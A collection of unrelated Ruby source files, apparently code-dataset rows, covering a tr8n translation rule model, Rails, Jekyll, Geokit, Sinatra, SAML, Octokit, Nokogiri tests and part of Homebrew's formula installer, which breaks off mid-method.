1125a57f156bbbd39f737752fc066f4f1e5b3d55 | 7,511 | #--
# Copyright (c) 2010-2013 Michael Berkovich, tr8nhub.com
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#++
#
#-- Tr8n::LanguageCaseRule Schema Information
#
# Table name: tr8n_language_case_rules
#
# id INTEGER not null, primary key
# language_case_id integer not null
# language_id integer
# translator_id integer
# definition text not null
# position integer
# created_at datetime not null
# updated_at datetime not null
#
# Indexes
#
# tr8n_lcr_t (translator_id)
# tr8n_lcr_l (language_id)
# tr8n_lcr_lc (language_case_id)
#
#++
class Tr8n::LanguageCaseRule < ActiveRecord::Base
self.table_name = :tr8n_language_case_rules
attr_accessible :language_case_id, :language_id, :translator_id, :definition, :position
attr_accessible :language, :language_case, :translator
belongs_to :language_case, :class_name => "Tr8n::LanguageCase"
belongs_to :language, :class_name => "Tr8n::Language"
belongs_to :translator, :class_name => "Tr8n::Translator"
serialize :definition
def definition
@indifferent_def ||= HashWithIndifferentAccess.new(super)
end
def self.cache_key(id)
"language_case_rule_[#{id}]"
end
def cache_key
self.class.cache_key(id)
end
# TODO: what is this for?
def self.by_id(id)
Tr8n::Cache.fetch(cache_key(id)) do
find_by_id(id)
end
end
def self.gender_options
[["not applicable", "none"], ["unknown", "unknown"], ["male", "male"], ["female", "female"]]
end
def self.condition_options(with_if = false)
opts = [["starts with", "starts_with"], ["does not start with", "does_not_start_with"],
["ends in", "ends_in"], ["does not end in", "does_not_end_in"],
["is", "is"], ["is not", "is_not"]]
return opts unless with_if
opts.each do |opt|
opt[0] = "if #{opt[0]}"
end
opts
end
def self.operation_options
[["replace with", "replace"], ["prepand", "prepand"], ["append", "append"]]
end
def self.operator_options
[["and", "and"], ["or", "or"]]
end
def evaluate(object, value)
value = value.to_s
if ["male", "female", "unknown", "neutral"].include?(definition["gender"])
object_gender = Tr8n::GenderRule.gender_token_value(object)
return false if definition["gender"] == "male" and object_gender != Tr8n::GenderRule.gender_object_value_for("male")
return false if definition["gender"] == "female" and object_gender != Tr8n::GenderRule.gender_object_value_for("female")
return false if definition["gender"] == "unknown" and object_gender != Tr8n::GenderRule.gender_object_value_for("unknown")
end
result1 = evaluate_part(value, 1)
if definition["multipart"] == "true"
result2 = evaluate_part(value, 2)
return false if definition["operator"] == "and" and !(result1 and result2)
return false if definition["operator"] == "or" and !(result1 or result2)
end
result1
end
def evaluate_part(token_value, index)
values = sanitize_values(definition["value#{index}"])
case definition["part#{index}"]
when "starts_with"
values.each do |value|
return true if token_value.to_s =~ /^#{value.to_s}/
end
return false
when "does_not_start_with"
values.each do |value|
return false if token_value.to_s =~ /^#{value.to_s}/
end
return true
when "ends_in"
values.each do |value|
return true if token_value.to_s =~ /#{value.to_s}$/
end
return false
when "does_not_end_in"
values.each do |value|
return false if token_value.to_s =~ /#{value.to_s}$/
end
return true
when "is"
return values.include?(token_value)
when "is_not"
return !values.include?(token_value)
end
false
end
def apply(value)
value = value.to_s
values = sanitize_values(definition["value1"])
regex = values.join('|')
case definition["operation"]
when "replace"
if definition["part1"] == "starts_with"
return value.gsub(/\b(#{regex})/, definition["operation_value"])
elsif definition["part1"] == "is"
return definition["operation_value"]
elsif definition["part1"] == "ends_in"
return value.gsub(/(#{regex})\b/, definition["operation_value"])
end
when "prepand"
return "#{definition["operation_value"]}#{value}"
when "append"
return "#{value}#{definition["operation_value"]}"
end
value
end
def sanitize_values(values)
return [] unless values
values.split(",").collect{|val| val.strip}
end
def humanize_values(values)
sanitize_values(values).join(", ")
end
def description
return "undefined rule" if definition.blank?
desc = "If"
if definition["gender"] != "none"
desc << " subject"
if ["male", "female"].include?(definition["gender"])
desc << " is a <strong>#{definition["gender"]}</strong>"
else
desc << " <strong>has an unknown gender</strong>"
end
end
desc << " and" unless desc == "If"
desc << " token value"
desc << describe_part(1)
if ["true", true].include?(definition["multipart"])
desc << " " << definition["operator"].to_s
desc << describe_part(2)
end
desc << ", then"
case definition["operation"]
when "replace" then desc << " replace it with"
when "prepand" then desc << " prepand the value with"
when "append" then desc << " append the value with"
end
desc << " <strong>'" << humanize_values(definition["operation_value"]) << "'</strong> "
desc.html_safe
end
def describe_part(index)
desc = ""
case definition["part#{index}"]
when "starts_with" then desc << " starts with"
when "does_not_start_with" then desc << " does not start with"
when "ends_in" then desc << " ends in"
when "does_not_end_in" then desc << " does not end in"
when "is" then desc << " is"
when "is_not" then desc << " is not"
end
desc << " <strong>'" << humanize_values(definition["value#{index}"]) << "'</strong>"
desc.html_safe
end
end | 33.088106 | 128 | 0.624018 |
7a5b6f70ca86351a92a4465e00a6ead87f8b4214 | 278 | class CreateClickThroughs < ActiveRecord::Migration[4.2]
def up
create_table :click_throughs do |t|
t.string 'url'
t.string 'source_url'
t.string 'user_id', null: true
t.timestamps
end
end
def down
drop_table :click_throughs
end
end
| 18.533333 | 56 | 0.661871 |
616927446bf173e019c11bb35f727f69a1bcbc3a | 493 | module Jekyll
class PageTag < Liquid::Tag
def initialize(tag_name, text, tokens)
super
@text = text.strip.downcase
end
def render(context)
site = context.registers[:site]
page = site.collections['pages'].docs.select{|p|p.data['title'].gsub(/\"/,'').downcase == @text}.first
if page.present?
"<a href='#{site.baseurl}#{page.url}'>#{page.data['title']}</a>"
end
end
end
end
Liquid::Template.register_tag('page', Jekyll::PageTag) | 25.947368 | 108 | 0.616633 |
081a4aadc54f0b3c3a28459bab8b3c1c72f3e4be | 4,720 | # These defaults are used in Geokit::Mappable.distance_to and acts_as_mappable
Geokit::default_units = :kms #:miles :kms, :nms, :meters
Geokit::default_formula = :sphere
# This is the timeout value in seconds to be used for calls to the geocoder web
# services. For no timeout at all, comment out the setting. The timeout unit
# is in seconds.
Geokit::Geocoders::request_timeout = 3
# This setting can be used if web service calls must be routed through a proxy.
# These setting can be nil if not needed, otherwise, a valid URI must be
# filled in at a minimum. If the proxy requires authentication, the username
# and password can be provided as well.
# Geokit::Geocoders::proxy = 'https://user:password@host:port'
# This is your yahoo application key for the Yahoo Geocoder.
# See http://developer.yahoo.com/faq/index.html#appid
# and http://developer.yahoo.com/maps/rest/V1/geocode.html
# Geokit::Geocoders::YahooGeocoder.key = 'REPLACE_WITH_YOUR_YAHOO_KEY'
# Geokit::Geocoders::YahooGeocoder.secret = 'REPLACE_WITH_YOUR_YAHOO_SECRET'
# This is your Google Maps geocoder keys (all optional).
# See http://www.google.com/apis/maps/signup.html
# and http://www.google.com/apis/maps/documentation/#Geocoding_Examples
# Geokit::Geocoders::GoogleGeocoder.client_id = ''
# Geokit::Geocoders::GoogleGeocoder.cryptographic_key = ''
# Geokit::Geocoders::GoogleGeocoder.channel = ''
# You can also use the free API key instead of signed requests
# See https://developers.google.com/maps/documentation/geocoding/#api_key
# Geokit::Geocoders::GoogleGeocoder.api_key = ''
# You can also set multiple API KEYS for different domains that may be directed
# to this same application.
# The domain from which the current user is being directed will automatically
# be updated for Geokit via
# the GeocoderControl class, which gets it's begin filter mixed
# into the ActionController.
# You define these keys with a Hash as follows:
# Geokit::Geocoders::google = {
# 'rubyonrails.org' => 'RUBY_ON_RAILS_API_KEY',
# ' ruby-docs.org' => 'RUBY_DOCS_API_KEY' }
# This is your username and password for geocoder.us.
# To use the free service, the value can be set to nil or false. For
# usage tied to an account, the value should be set to username:password.
# See http://geocoder.us
# and http://geocoder.us/user/signup
# Geokit::Geocoders::UsGeocoder.key = 'username:password'
# This is your authorization key for geocoder.ca.
# To use the free service, the value can be set to nil or false. For
# usage tied to an account, set the value to the key obtained from
# Geocoder.ca.
# See http://geocoder.ca
# and http://geocoder.ca/?register=1
# Geokit::Geocoders::CaGeocoder.key = 'KEY'
# This is your username key for geonames.
# To use this service either free or premium, you must register a key.
# See http://www.geonames.org
# Geokit::Geocoders::GeonamesGeocoder.key = 'KEY'
# Most other geocoders need either no setup or a key
# Geokit::Geocoders::BingGeocoder.key = ''
# Geokit::Geocoders::MapQuestGeocoder.key = ''
# Geokit::Geocoders::YandexGeocoder.key = ''
# Geokit::Geocoders::MapboxGeocoder.key = 'ACCESS_TOKEN'
# Geokit::Geocoders::OpencageGeocoder.key = 'some_api_key'
# Geonames has a free service and a premium service, each using a different URL
# GeonamesGeocoder.premium = true will use http://ws.geonames.net (premium)
# GeonamesGeocoder.premium = false will use http://api.geonames.org (free)
# Geokit::Geocoders::GeonamesGeocoder.premium = false
# require "external_geocoder.rb"
# Please see the section "writing your own geocoders" for more information.
# Geokit::Geocoders::external_key = 'REPLACE_WITH_YOUR_API_KEY'
# This is the order in which the geocoders are called in a failover scenario
# If you only want to use a single geocoder, put a single symbol in the array.
# Valid symbols are :google, :yahoo, :us, and :ca.
# Be aware that there are Terms of Use restrictions on how you can use the
# various geocoders. Make sure you read up on relevant Terms of Use for each
# geocoder you are going to use.
# Geokit::Geocoders::provider_order = [:google,:us]
# The IP provider order. Valid symbols are :ip,:geo_plugin.
# As before, make sure you read up on relevant Terms of Use for each.
# Geokit::Geocoders::ip_provider_order = [:external,:geo_plugin,:ip]
# Disable HTTPS globally. This option can also be set on individual
# geocoder classes.
# Geokit::Geocoders::secure = false
# Control verification of the server certificate for geocoders using HTTPS
# Geokit::Geocoders::ssl_verify_mode = OpenSSL::SSL::VERIFY_(PEER/NONE)
# Setting this to VERIFY_NONE may be needed on systems that don't have
# a complete or up to date root certificate store. Only applies to
# the Net::HTTP adapter.
| 46.732673 | 79 | 0.758686 |
ed90d10f6aabd453ca8aef1d1dd5f9fd122a7b60 | 1,136 | require 'tempfile'
Given /^I already have a Berkshelf config file$/ do
path = Tempfile.new('berkshelf').path
config = Berkshelf::Config.new(path)
config.save
Berkshelf.config = config
ENV['BERKSHELF_CONFIG'] = path
set_env 'BERKSHELF_CONFIG', path
end
Given /^I have a Berkshelf config file containing:$/ do |contents|
path = Berkshelf.config.path
FileUtils.mkdir_p(Pathname.new(path).dirname.to_s)
File.open(path, 'w+') { |f| f.write(contents) }
Berkshelf.config = Berkshelf::Config.from_file(path)
end
Then /^a Berkshelf config file should exist and contain:$/ do |table|
# Have to reload the config...
Berkshelf.config.reload
check_file_presence([Berkshelf.config.path], true)
table.raw.each do |key, value|
expect(Berkshelf.config[key]).to eq(value)
end
end
Then /^a Berkshelf config file should exist at "(.+)" and contain:$/ do |path, table|
check_file_presence([path], true)
path = File.expand_path(File.join('tmp', 'aruba', path))
Berkshelf.config = Berkshelf::Config.from_file(path)
table.raw.each do |key, value|
expect(Berkshelf.config[key]).to eq(value)
end
end
| 25.818182 | 85 | 0.711268 |
b95d2913915f48b579db807a5e8de9daa4b32967 | 902 | require 'sinatra/base'
require_relative 'feed'
class NowPlaying < Sinatra::Base
set :root, File.expand_path("#{File.dirname(__FILE__)}/../app")
set :public_folder, 'public'
before do
content_type :json
headers 'Access-Control-Allow-Origin' => '*',
'Access-Control-Allow-Methods' => %w[OPTIONS GET]
end
# Allow the app to serve static files from the 'public' directory in :root
enable :static
def output_feed(klass)
feed = klass.new
feed.read
JSON.generate(feed.translate_feed)
end
get '/' do
content_type :html
send_file File.join(settings.public_folder, 'index.html')
end
get '/counterstream' do
output_feed(Counterstream)
end
get '/dronezone' do
output_feed(DroneZone)
end
get '/earwaves' do
output_feed(Earwaves)
end
get '/q2' do
output_feed(Q2)
end
get '/yle' do
output_feed(Yle)
end
end
| 18.791667 | 76 | 0.669623 |
e269d97f3f44e24f6c4901fe214f146ffd482ef8 | 723 | # frozen_string_literal: true
require 'rails/generators'
# Creates the Queues initializer file for Rails apps.
#
# @example Invokation from terminal
# rails generate queues_rabbit
#
class QueuesRabbitGenerator < Rails::Generators::Base
desc "Description:\n This prepares Rails for RabbitMQ Queues"
source_root File.expand_path('templates', __dir__)
desc 'Initialize Rails for RabbitMQ Queues'
def generate_layout
if !File.exist?('app/queues/application_queue.rb')
generate 'queues'
end
template 'schema.rb', 'app/queues/rabbits/schema.rb'
template 'queue.rb', 'app/queues/rabbits/queues/my_queue.rb'
template 'exchange.rb', 'app/queues/rabbits/exchanges/my_exchange.rb'
end
end
| 26.777778 | 73 | 0.748271 |
ff0d4f2cedeac556a5377674eaad667f1a0eaa45 | 536 | # frozen_string_literal: true
# Synchronize political_force with main site
class NetworkPoliticalForceSyncJob < ApplicationJob
queue_as :default
# @param [Integer] entity_id
# @param [TrueClass|FalseClass] for_update
def perform(entity_id, for_update = false)
entity = PoliticalForce.find_by(id: entity_id)
return if entity.nil?
handler = NetworkManager::PoliticalForceHandler.new
return unless Rails.env.production?
for_update ? handler.update_remote(entity) : handler.create_remote(entity)
end
end
| 25.52381 | 78 | 0.768657 |
e8721a736ba69050ac8cfcb646d928ec90cdda48 | 829 | Gem::Specification.new do |s|
s.name = 'acts_as_commentable_with_threading'
s.version = '2.0.1'
s.date = '2015-12-22'
s.summary = 'Polymorphic comments Rails gem - Rails 4+ only'
s.email = '[email protected]'
s.homepage = 'http://github.com/elight/acts_as_commentable_with_threading'
s.description = 'Polymorphic threaded comments Rails gem for Rails 4+'
s.authors = ['Evan Light', 'Jack Dempsey', 'Xelipe', 'xxx']
s.files = `git ls-files`.split("\n")
s.test_files = `git ls-files -- spec/*`.split("\n")
s.add_development_dependency 'rake'
s.add_development_dependency 'rspec', '>= 3.0'
s.add_development_dependency 'rails', '>= 4.0'
s.add_dependency 'activerecord', '>= 4.0'
s.add_dependency 'activesupport', '>= 4.0'
s.add_dependency 'awesome_nested_set', '>= 3.1.1'
end
| 39.47619 | 76 | 0.676719 |
abd40d525a298186156d72ad3ff6a4529ea54490 | 2,641 | # encoding: utf-8
module SamlIdp
require 'active_support/all'
require 'saml_idp/saml_response'
require 'saml_idp/xml_security'
require 'saml_idp/configurator'
require 'saml_idp/controller'
require 'saml_idp/default'
require 'saml_idp/metadata_builder'
require 'saml_idp/version'
require 'saml_idp/engine' if defined?(::Rails) && Rails::VERSION::MAJOR > 2
def self.config
@config ||= SamlIdp::Configurator.new
end
def self.configure
yield config
end
def self.metadata
@metadata ||= MetadataBuilder.new(config)
end
end
# TODO Needs extraction out
module Saml
module XML
module Namespaces
METADATA = "urn:oasis:names:tc:SAML:2.0:metadata"
ASSERTION = "urn:oasis:names:tc:SAML:2.0:assertion"
SIGNATURE = "http://www.w3.org/2000/09/xmldsig#"
PROTOCOL = "urn:oasis:names:tc:SAML:2.0:protocol"
module Statuses
SUCCESS = "urn:oasis:names:tc:SAML:2.0:status:Success"
end
module Consents
UNSPECIFIED = "urn:oasis:names:tc:SAML:2.0:consent:unspecified"
end
module AuthnContext
module ClassRef
PASSWORD = "urn:oasis:names:tc:SAML:2.0:ac:classes:Password"
PASSWORD_PROTECTED = "urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport"
end
end
module Methods
BEARER = "urn:oasis:names:tc:SAML:2.0:cm:bearer"
end
module Formats
module Attr
URI = "urn:oasis:names:tc:SAML:2.0:attrname-format:uri"
end
module NameId
EMAIL_ADDRESS = "urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress"
TRANSIENT = "urn:oasis:names:tc:SAML:2.0:nameid-format:transient"
PERSISTENT = "urn:oasis:names:tc:SAML:2.0:nameid-format:persistent"
end
end
end
class Document < Nokogiri::XML::Document
def signed?
!!xpath("//ds:Signature", ds: signature_namespace).first
end
def options_have_signature(options)
options[:get_params] && options[:get_params][:Signature]
end
private :options_have_signature
def valid_signature?(fingerprint, options = {})
(signed? || options_have_signature(options)) &&
signed_document.validate(fingerprint, :soft, options)
end
def signed_document
SamlIdp::XMLSecurity::SignedDocument.new(to_xml)
end
def signature_namespace
Namespaces::SIGNATURE
end
def to_xml
super(
save_with: Nokogiri::XML::Node::SaveOptions::AS_XML | Nokogiri::XML::Node::SaveOptions::NO_DECLARATION
).strip
end
end
end
end
| 26.94898 | 112 | 0.654676 |
7a7bb6886a372e21a122a0dde834820cb97e4cd7 | 1,601 | module Octokit
# Class to parse GitHub repository owner and name from
# URLs and to generate URLs
class Repository
attr_accessor :owner, :name, :id
# Instantiate from a GitHub repository URL
#
# @return [Repository]
def self.from_url(url)
Repository.new(URI.parse(url).path[1..-1])
end
def initialize(repo)
case repo
when Integer
@id = repo
when String
@owner, @name = repo.split('/')
when Repository
@owner = repo.owner
@name = repo.name
when Hash
@name = repo[:repo] ||= repo[:name]
@owner = repo[:owner] ||= repo[:user] ||= repo[:username]
end
end
# Repository owner/name
# @return [String]
def slug
"#{@owner}/#{@name}"
end
alias :to_s :slug
# @return [String] Repository API path
def path
return named_api_path if @owner && @name
return id_api_path if @id
end
# Get the api path for a repo
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [String] Api path.
def self.path repo
new(repo).path
end
# @return [String] Api path for owner/name identified repos
def named_api_path
"repos/#{slug}"
end
# @return [String] Api path for id identified repos
def id_api_path
"repositories/#{@id}"
end
# Repository URL based on {Octokit::Client#web_endpoint}
# @return [String]
def url
"#{Octokit.web_endpoint}#{slug}"
end
alias :user :owner
alias :username :owner
alias :repo :name
end
end
| 22.549296 | 74 | 0.598376 |
6a709a88f6baf790abcd11a766ae8f9bc81af517 | 2,890 | require File.expand_path(File.join(File.dirname(__FILE__), '..', "helper"))
require File.join(File.dirname(__FILE__),"load_files")
class TestPreserved < Nokogiri::TestCase
def assert_roundtrip str
doc = Nokogiri.Hpricot(str)
yield doc if block_given?
str2 = doc.to_original_html
[*str].zip([*str2]).each do |s1, s2|
assert_equal s1, s2
end
end
def assert_html str1, str2
doc = Nokogiri.Hpricot(str2)
yield doc if block_given?
assert_equal str1, doc.to_original_html
end
####
# Not supporting to_original_html
#def test_simple
# str = "<p>Hpricot is a <b>you know <i>uh</b> fine thing.</p>"
# assert_html str, str
# assert_html "<p class=\"new\">Hpricot is a <b>you know <i>uh</b> fine thing.</p>", str do |doc|
# (doc/:p).set('class', 'new')
# end
#end
####
# Not supporting to_original_html
#def test_parent
# str = "<html><base href='/'><head><title>Test</title></head><body><div id='wrap'><p>Paragraph one.</p><p>Paragraph two.</p></div></body></html>"
# assert_html str, str
# assert_html "<html><base href='/'><body><div id=\"all\"><div><p>Paragraph one.</p></div><div><p>Paragraph two.</p></div></div></body></html>", str do |doc|
# (doc/:head).remove
# (doc/:div).set('id', 'all')
# (doc/:p).wrap('<div></div>')
# end
#end
# Not really a valid test. If libxml can figure out the encoding of the file,
# it will use that encoding, otherwise it uses the &#xwhatever so that no data
# is lost.
#
# libxml on OSX can't figure out the encoding, so this tests passes. linux
# can figure out the encoding, so it fails.
#def test_escaping_of_contents
# doc = Nokogiri.Hpricot(TestFiles::BOINGBOING)
# assert_equal "Fukuda’s Automatic Door opens around your body as you pass through it. The idea is to save energy and keep the room clean.", doc.at("img[@alt='200606131240']").next.to_s.strip
#end
####
# Modified. No.
#def test_files
# assert_roundtrip TestFiles::BASIC
# assert_roundtrip TestFiles::BOINGBOING
# assert_roundtrip TestFiles::CY0
#end
####
# Modified.. When calling "to_html" on the document, proper html/doc tags
# are produced too.
def test_escaping_of_attrs
# ampersands in URLs
str = %{<a href="http://google.com/search?q=nokogiri&l=en">Google</a>}
link = (doc = Nokogiri.Hpricot(str)).at(:a)
assert_equal "http://google.com/search?q=nokogiri&l=en", link['href']
assert_equal "http://google.com/search?q=nokogiri&l=en", link.get_attribute('href')
assert_equal "http://google.com/search?q=nokogiri&l=en", link.raw_attributes['href']
assert_equal str, link.to_html
# alter the url
link['href'] = "javascript:alert(\"AGGA-KA-BOO!\")"
assert_equal %{<a href="javascript:alert("AGGA-KA-BOO!")">Google</a>}, link.to_html.gsub(/%22/, '"')
end
end
| 37.051282 | 201 | 0.658478 |
1d009d21ebe8fc150c676da5cf4bad7bcabe8eaa | 1,312 | # frozen_string_literal: true
module Types
class EveAncestryType < Types::BaseObject
description "Ancestry object"
field :id, ID,
method: :ancestry_id,
description: "Ancestry ID",
null: false
field :name, GraphQL::Types::JSON,
description: "Name",
null: true
field :description, GraphQL::Types::JSON,
description: "Description",
null: true
field :bloodline_id, Integer,
description: "Bloodline ID",
null: true
field :bloodline, Types::EveBloodlineType,
description: "Bloodline",
null: true
field :icon_id, Integer,
description: "Icon ID",
null: true
field :icon, Types::EveIconType,
description: "Icon",
null: true
field :short_description, String,
description: "Short description",
null: true
def name
{
en: object.name_en,
de: object.name_de,
fr: object.name_fr,
ja: object.name_ja,
ru: object.name_ru,
ko: object.name_ko
}
end
def description
{
en: object.description_en,
de: object.description_de,
fr: object.description_fr,
ja: object.description_ja,
ru: object.description_ru,
ko: object.description_ko
}
end
end
end
| 20.825397 | 46 | 0.601372 |
61b13693010a4930a4784b0a2b0e77e2074f30f4 | 497 | require "spec_helper"
describe SpreeShopifyImporter::Importers::TaxonImporterJob, type: :job do
subject { described_class.new }
describe "#perfrom" do
let(:resource) { double("ShopifyCustomCollection") }
it "calls a importer service" do
expect(SpreeShopifyImporter::Importers::TaxonImporter).to receive(:new).and_call_original
expect_any_instance_of(SpreeShopifyImporter::Importers::TaxonImporter).to receive(:import!)
subject.perform(resource)
end
end
end
| 29.235294 | 97 | 0.752515 |
28061442e786f36c315d6624edb7c1d35b81d8d4 | 20,093 | # encoding: UTF-8
require 'cxxstdlib'
require 'exceptions'
require 'formula'
require 'keg'
require 'tab'
require 'bottles'
require 'caveats'
require 'cleaner'
require 'formula_cellar_checks'
require 'install_renamed'
require 'cmd/tap'
require 'hooks/bottles'
class FormulaInstaller
include FormulaCellarChecks
def self.mode_attr_accessor(*names)
attr_accessor(*names)
names.each { |name| define_method("#{name}?") { !!send(name) }}
end
attr_reader :f
attr_accessor :options
mode_attr_accessor :show_summary_heading, :show_header
mode_attr_accessor :build_from_source, :build_bottle, :force_bottle
mode_attr_accessor :ignore_deps, :only_deps, :interactive
mode_attr_accessor :verbose, :debug
def initialize ff
@f = ff
@show_header = false
@ignore_deps = false
@only_deps = false
@build_from_source = false
@build_bottle = false
@force_bottle = false
@interactive = false
@verbose = false
@debug = false
@options = Options.new
@@attempted ||= Set.new
@poured_bottle = false
@pour_failed = false
end
def pour_bottle? install_bottle_options={:warn=>false}
return true if Homebrew::Hooks::Bottles.formula_has_bottle?(f)
return false if @pour_failed
return true if force_bottle? && f.bottle
return false if build_from_source? || build_bottle? || interactive?
return false unless options.empty?
return true if f.local_bottle_path
return false unless f.bottle && f.pour_bottle?
f.requirements.each do |req|
next if req.optional? || req.pour_bottle?
if install_bottle_options[:warn]
ohai "Building source; bottle blocked by #{req} requirement"
end
return false
end
unless f.bottle.compatible_cellar?
if install_bottle_options[:warn]
opoo "Building source; cellar of #{f}'s bottle is #{f.bottle.cellar}"
end
return false
end
true
end
def install_bottle_for_dep?(dep, build)
return false if build_from_source?
return false unless dep.bottle && dep.pour_bottle?
return false unless build.used_options.empty?
return false unless dep.bottle.compatible_cellar?
return true
end
def prelude
verify_deps_exist unless ignore_deps?
lock
check_install_sanity
end
def verify_deps_exist
f.recursive_dependencies.map(&:to_formula)
rescue TapFormulaUnavailableError => e
Homebrew.install_tap(e.user, e.repo)
retry
rescue FormulaUnavailableError => e
e.dependent = f.name
raise
end
def check_install_sanity
raise FormulaInstallationAlreadyAttemptedError, f if @@attempted.include? f
if f.installed?
msg = "#{f}-#{f.installed_version} already installed"
msg << ", it's just not linked" unless f.linked_keg.symlink? or f.keg_only?
raise FormulaAlreadyInstalledError, msg
end
# Building head-only without --HEAD is an error
if not ARGV.build_head? and f.stable.nil?
raise CannotInstallFormulaError, <<-EOS.undent
#{f} is a head-only formula
Install with `brew install --HEAD #{f.name}
EOS
end
# Building stable-only with --HEAD is an error
if ARGV.build_head? and f.head.nil?
raise CannotInstallFormulaError, "No head is defined for #{f.name}"
end
unless ignore_deps?
unlinked_deps = f.recursive_dependencies.map(&:to_formula).select do |dep|
dep.installed? and not dep.keg_only? and not dep.linked_keg.directory?
end
raise CannotInstallFormulaError,
"You must `brew link #{unlinked_deps*' '}' before #{f} can be installed" unless unlinked_deps.empty?
end
end
def build_bottle_preinstall
@etc_var_glob ||= "#{HOMEBREW_PREFIX}/{etc,var}/**/*"
@etc_var_preinstall = Dir[@etc_var_glob]
end
def build_bottle_postinstall
@etc_var_postinstall = Dir[@etc_var_glob]
(@etc_var_postinstall - @etc_var_preinstall).each do |file|
Pathname.new(file).cp_path_sub(HOMEBREW_PREFIX, f.bottle_prefix)
end
end
def install
# not in initialize so upgrade can unlink the active keg before calling this
# function but after instantiating this class so that it can avoid having to
# relink the active keg if possible (because it is slow).
if f.linked_keg.directory?
# some other version is already installed *and* linked
raise CannotInstallFormulaError, <<-EOS.undent
#{f}-#{f.linked_keg.resolved_path.basename} already installed
To install this version, first `brew unlink #{f}'
EOS
end
check_conflicts
compute_and_install_dependencies unless ignore_deps?
return if only_deps?
if build_bottle? && (arch = ARGV.bottle_arch) && !Hardware::CPU.optimization_flags.include?(arch)
raise "Unrecognized architecture for --bottle-arch: #{arch}"
end
oh1 "Installing #{Tty.green}#{f}#{Tty.reset}" if show_header?
@@attempted << f
begin
if pour_bottle? :warn => true
pour
@poured_bottle = true
stdlibs = Keg.new(f.prefix).detect_cxx_stdlibs
stdlib_in_use = CxxStdlib.new(stdlibs.first, MacOS.default_compiler)
begin
stdlib_in_use.check_dependencies(f, f.recursive_dependencies)
rescue IncompatibleCxxStdlibs => e
opoo e.message
end
stdlibs = Keg.new(f.prefix).detect_cxx_stdlibs :skip_executables => true
tab = Tab.for_keg f.prefix
tab.poured_from_bottle = true
tab.write
end
rescue => e
raise e if ARGV.homebrew_developer?
@pour_failed = true
onoe e.message
opoo "Bottle installation failed: building from source."
end
build_bottle_preinstall if build_bottle?
unless @poured_bottle
compute_and_install_dependencies if @pour_failed and not ignore_deps?
build
clean
end
build_bottle_postinstall if build_bottle?
opoo "Nothing was installed to #{f.prefix}" unless f.installed?
end
# HACK: If readline is present in the dependency tree, it will clash
# with the stdlib's Readline module when the debugger is loaded
def perform_readline_hack
if (f.recursive_dependencies.any? { |d| d.name == "readline" } || f.name == "readline") && debug?
ENV['HOMEBREW_NO_READLINE'] = '1'
end
end
def check_conflicts
return if ARGV.force?
conflicts = f.conflicts.reject do |c|
keg = Formula.factory(c.name).prefix
not keg.directory? && Keg.new(keg).linked?
end
raise FormulaConflictError.new(f, conflicts) unless conflicts.empty?
end
def compute_and_install_dependencies
perform_readline_hack
req_map, req_deps = expand_requirements
check_requirements(req_map)
deps = [].concat(req_deps).concat(f.deps)
deps = expand_dependencies(deps)
if deps.empty? and only_deps?
puts "All dependencies for #{f} are satisfied."
else
install_dependencies(deps)
end
end
def check_requirements(req_map)
fatals = []
req_map.each_pair do |dependent, reqs|
reqs.each do |req|
puts "#{dependent}: #{req.message}"
fatals << req if req.fatal?
end
end
raise UnsatisfiedRequirements.new(f, fatals) unless fatals.empty?
end
def expand_requirements
unsatisfied_reqs = Hash.new { |h, k| h[k] = [] }
deps = []
formulae = [f]
while f = formulae.pop
ARGV.filter_for_dependencies do
f.recursive_requirements do |dependent, req|
build = effective_build_options_for(dependent)
if (req.optional? || req.recommended?) && build.without?(req)
Requirement.prune
elsif req.build? && dependent == f && pour_bottle?
Requirement.prune
elsif req.build? && dependent != f && install_bottle_for_dep?(dependent, build)
Requirement.prune
elsif req.satisfied?
Requirement.prune
elsif req.default_formula?
dep = req.to_dependency
deps.unshift(dep)
formulae.unshift(dep.to_formula)
Requirement.prune
else
unsatisfied_reqs[dependent] << req
end
end
end
end
return unsatisfied_reqs, deps
end
def expand_dependencies(deps)
inherited_options = {}
expanded_deps = ARGV.filter_for_dependencies do
Dependency.expand(f, deps) do |dependent, dep|
options = inherited_options[dep.name] = inherited_options_for(dep)
build = effective_build_options_for(
dependent,
inherited_options.fetch(dependent.name, [])
)
if (dep.optional? || dep.recommended?) && build.without?(dep)
Dependency.prune
elsif dep.build? && dependent == f && pour_bottle?
Dependency.prune
elsif dep.build? && dependent != f && install_bottle_for_dep?(dependent, build)
Dependency.prune
elsif dep.satisfied?(options)
Dependency.skip
end
end
end
expanded_deps.map { |dep| [dep, inherited_options[dep.name]] }
end
def effective_build_options_for(dependent, inherited_options=[])
if dependent == f
build = dependent.build.dup
build.args |= options
build
else
build = dependent.build.dup
build.args |= inherited_options
build
end
end
def inherited_options_for(dep)
inherited_options = Options.new
if (options.include?("universal") || f.build.universal?) && !dep.build? && dep.to_formula.build.has_option?("universal")
inherited_options << Option.new("universal")
end
inherited_options
end
def install_dependencies(deps)
if deps.length > 1
oh1 "Installing dependencies for #{f}: #{Tty.green}#{deps.map(&:first)*", "}#{Tty.reset}"
end
ARGV.filter_for_dependencies do
deps.each { |dep, options| install_dependency(dep, options) }
end
@show_header = true unless deps.empty?
end
class DependencyInstaller < FormulaInstaller
def initialize ff
super
@ignore_deps = true
end
def sanitized_ARGV_options
args = super
args.delete "--ignore-dependencies"
args
end
end
def install_dependency(dep, inherited_options)
df = dep.to_formula
tab = Tab.for_formula(df)
if df.linked_keg.directory?
